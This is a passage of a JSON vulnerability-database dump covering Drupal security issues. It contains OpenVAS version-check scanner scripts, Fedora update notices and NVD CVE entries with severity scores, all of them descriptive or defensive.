$\");\n script_tag(name:\"creation_date\", value:\"2018-02-22 10:43:18 +0530 (Thu, 22 Feb 2018)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Drupal Core Multiple Vulnerabilities (SA-CORE-2018-001) (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is running Drupal and is prone\n to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An improper access restriction for sensitive contents via 'Comment reply form'.\n\n - 'Drupal.checkPlain' JavaScript function does not correctly handle all methods\n of injecting malicious HTML.\n\n - Private file access check fails under certain conditions in which one module\n is trying to grant access to the file and another is trying to deny it.\n\n - A jQuery cross site scripting vulnerability is present when making Ajax\n requests to untrusted domains.\n\n - Language fallback can be incorrect on multilingual sites with node access\n restrictions.\n\n - An error in 'Settings Tray module'.\n\n - An external link injection vulnerability when the language switcher block\n is used.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to trick users into unwillingly navigating to an external site,\n update certain data that they do not have the permissions for, execute\n arbitrary script and gain extra privileges.\");\n\n script_tag(name:\"affected\", value:\"Drupal core version 8.x versions prior to\n 8.4.5 and 7.x versions prior to 7.57 on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Drupal core version 8.4.5 or\n 7.57 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://www.drupal.org/sa-core-2018-001\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"drupal_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"drupal/installed\", \"Host/runs_unixoide\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!drupalPort = get_app_port(cpe:CPE)) {\n exit(0);\n}\n\nif(!infos = get_app_version_and_location(cpe:CPE, port:drupalPort, version_regex:\"^[0-9]\\.[0-9]+\", exit_no_version:TRUE)) {\n exit(0);\n}\n\ndrupalVer = infos['version'];\npath = infos['location'];\n\nif(drupalVer =~ \"^(8\\.)\" && version_is_less(version:drupalVer, test_version:\"8.4.5\")) {\n fix = \"8.4.5\";\n}\n\nif(drupalVer =~ \"^(7\\.)\" && version_is_less(version:drupalVer, test_version:\"7.57\")) {\n fix = \"7.57\";\n}\n\nif(fix) {\n report = report_fixed_ver(installed_version:drupalVer, fixed_version:fix, install_path:path);\n security_message(data:report, port:drupalPort);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6932", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6929", "CVE-2017-6930", "CVE-2017-6927", "CVE-2017-6928"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-04-11T00:00:00", "id": "OPENVAS:1361412562310874357", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874357", "type": "openvas", "title": "Fedora Update for drupal7 FEDORA-2018-143886fdbd", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_143886fdbd_drupal7_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal7 FEDORA-2018-143886fdbd\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874357\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-11 15:27:38 +0200 (Wed, 11 Apr 2018)\");\n script_cve_id(\"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6928\", \"CVE-2017-6929\",\n \"CVE-2017-6930\", \"CVE-2017-6931\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal7 FEDORA-2018-143886fdbd\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"drupal7 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-143886fdbd\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZBM5HFYT2M2FYIHGR52TOPVTUA243KUS\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal7\", rpm:\"drupal7~7.58~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-7600", "CVE-2017-6924", "CVE-2017-6932", "CVE-2017-6931", "CVE-2017-6926", "CVE-2017-6923", "CVE-2017-6920", "CVE-2017-6929", "CVE-2017-6921", "CVE-2017-6930", "CVE-2017-6922", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6925"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-04-25T00:00:00", "id": "OPENVAS:1361412562310874383", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874383", "type": "openvas", "title": "Fedora Update for drupal8 FEDORA-2018-922cc2fbaa", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_922cc2fbaa_drupal8_fc26.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for drupal8 FEDORA-2018-922cc2fbaa\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874383\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-04-25 08:51:34 +0200 (Wed, 25 Apr 2018)\");\n script_cve_id(\"CVE-2018-7600\", \"CVE-2017-6926\", \"CVE-2017-6927\", \"CVE-2017-6930\",\n \"CVE-2017-6931\", \"CVE-2017-6923\", \"CVE-2017-6924\", \"CVE-2017-6925\",\n \"CVE-2017-6920\", \"CVE-2017-6921\", \"CVE-2017-6922\", \"CVE-2017-6928\",\n \"CVE-2017-6929\", \"CVE-2017-6932\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for drupal8 FEDORA-2018-922cc2fbaa\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'drupal8'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"drupal8 on Fedora 26\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"FEDORA\", value:\"2018-922cc2fbaa\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/S4QXGSUTNGLGN67JM5KBVWO26ICKTRXL\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC26\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"drupal8\", rpm:\"drupal8~8.3.9~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6929", "CVE-2017-6932", "CVE-2018-7600", "CVE-2018-7602"], "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "modified": "2018-05-10T19:16:35", "published": "2018-05-10T19:16:35", "id": "FEDORA:9FC6E6070D50", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: drupal7-7.59-1.fc27", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6930", "CVE-2017-6931", "CVE-2017-6932", "CVE-2018-7600"], "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "modified": "2018-04-24T04:02:47", "published": "2018-04-24T04:02:47", "id": "FEDORA:9DFEE60469B4", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: drupal8-8.4.6-3.fc27", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6930", "CVE-2017-6931", "CVE-2017-6932", "CVE-2018-7600"], "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "modified": "2018-04-27T04:14:07", "published": "2018-04-27T04:14:07", "id": "FEDORA:D89B16076A01", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.4.6-3.fc28", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6930", "CVE-2017-6931", "CVE-2017-6932"], "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "modified": "2018-04-03T13:29:13", "published": "2018-04-03T13:29:13", "id": "FEDORA:DF854604E1ED", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal7-7.58-1.fc28", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6930", "CVE-2017-6931", "CVE-2017-6932"], "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "modified": "2018-04-10T18:30:33", "published": "2018-04-10T18:30:33", "id": "FEDORA:8BCEA60BDB0F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: drupal7-7.58-1.fc26", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6930", "CVE-2017-6931", "CVE-2017-6932"], "description": "Equipped with a powerful blend of features, Drupal is a Content Management System written in PHP that can support a variety of websites ranging from personal weblogs to large community-driven websites. Drupal is highly configurable, skinnable, and secure. ", "modified": "2018-04-10T19:11:10", "published": "2018-04-10T19:11:10", "id": "FEDORA:E111463966BA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: drupal7-7.58-1.fc27", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-6920", "CVE-2017-6921", "CVE-2017-6922", "CVE-2017-6923", "CVE-2017-6924", "CVE-2017-6925", "CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6930", "CVE-2017-6931", "CVE-2017-6932", "CVE-2018-7600"], "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "modified": "2018-04-24T03:28:25", "published": "2018-04-24T03:28:25", "id": "FEDORA:C2CB46042D4E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: drupal8-8.3.9-1.fc26", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "modified": "2019-03-07T20:06:44", "published": "2019-03-07T20:06:44", "id": "FEDORA:7595560DCBCA", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.10-1.fc28", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "modified": "2018-05-09T21:27:49", "published": "2018-05-09T21:27:49", "id": "FEDORA:5C39A60311F1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.4.8-1.fc28", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:55", "bulletinFamily": "unix", "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861"], "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "modified": "2018-12-03T01:39:06", "published": "2018-12-03T01:39:06", "id": "FEDORA:4B26D6048172", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.2-1.fc28", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-12-09T20:13:35", "description": "Drupal core 7.x versions before 7.57 when using Drupal's private file system, Drupal will check to make sure a user has access to a file before allowing the user to view or download it. This check fails under certain conditions in which one module is trying to grant access to the file and another is trying to deny it, leading to an access bypass vulnerability. This vulnerability is mitigated by the fact that it only occurs for unusual site configurations.", "edition": 6, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-03-01T23:29:00", "title": "CVE-2017-6928", "type": "cve", "cwe": ["CWE-732"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6928"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-6928", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6928", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:13:35", "description": "A jQuery cross site scripting vulnerability is present when making Ajax requests to untrusted domains. This vulnerability is mitigated by the fact that it requires contributed or custom modules in order to exploit. For Drupal 8, this vulnerability was already fixed in Drupal 8.4.0 in the Drupal core upgrade to jQuery 3. For Drupal 7, it is fixed in the current release (Drupal 7.57) for jQuery 1.4.4 (the version that ships with Drupal 7 core) as well as for other newer versions of jQuery that might be used on the site, for example using the jQuery Update module.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-03-01T23:29:00", "title": "CVE-2017-6929", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6929"], "modified": "2018-03-21T16:54:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-6929", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6929", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:13:35", "description": "Drupal core 7.x versions before 7.57 has an external link injection vulnerability when the language switcher block is used. A similar vulnerability exists in various custom and contributed modules. This vulnerability could allow an attacker to trick users into unwillingly navigating to an external site.", "edition": 5, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.7, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-03-01T23:29:00", "title": "CVE-2017-6932", "type": "cve", "cwe": ["CWE-601"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6932"], "modified": "2018-03-22T13:53:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-6932", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6932", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:13:35", "description": "In Drupal core 8.x prior to 8.3.4 and Drupal core 7.x prior to 7.56; Private files that have been uploaded by an anonymous user but not permanently attached to content on the site should only be visible to the anonymous user that uploaded them, rather than all anonymous users. Drupal core did not previously provide this protection, allowing an access bypass vulnerability to occur. This issue is mitigated by the fact that in order to be affected, the site must allow anonymous users to upload files into a private file system.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2019-01-22T15:29:00", "title": "CVE-2017-6922", "type": "cve", "cwe": ["CWE-552"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6922"], "modified": "2019-10-09T23:29:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-6922", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6922", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:13:35", "description": "Drupal 8.4.x versions before 8.4.5 and Drupal 7.x versions before 7.57 has a Drupal.checkPlain() JavaScript function which is used to escape potentially dangerous text before outputting it to HTML (as JavaScript output does not typically go through Twig autoescaping). This function does not correctly handle all methods of injecting malicious HTML, leading to a cross-site scripting vulnerability under certain circumstances. The PHP functions which Drupal provides for HTML escaping are not affected.", "edition": 5, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2018-03-01T23:29:00", "title": "CVE-2017-6927", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6927"], "modified": "2018-03-22T17:28:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2017-6927", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6927", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T20:25:46", "description": "A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-19T17:29:00", "title": "CVE-2018-7602", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 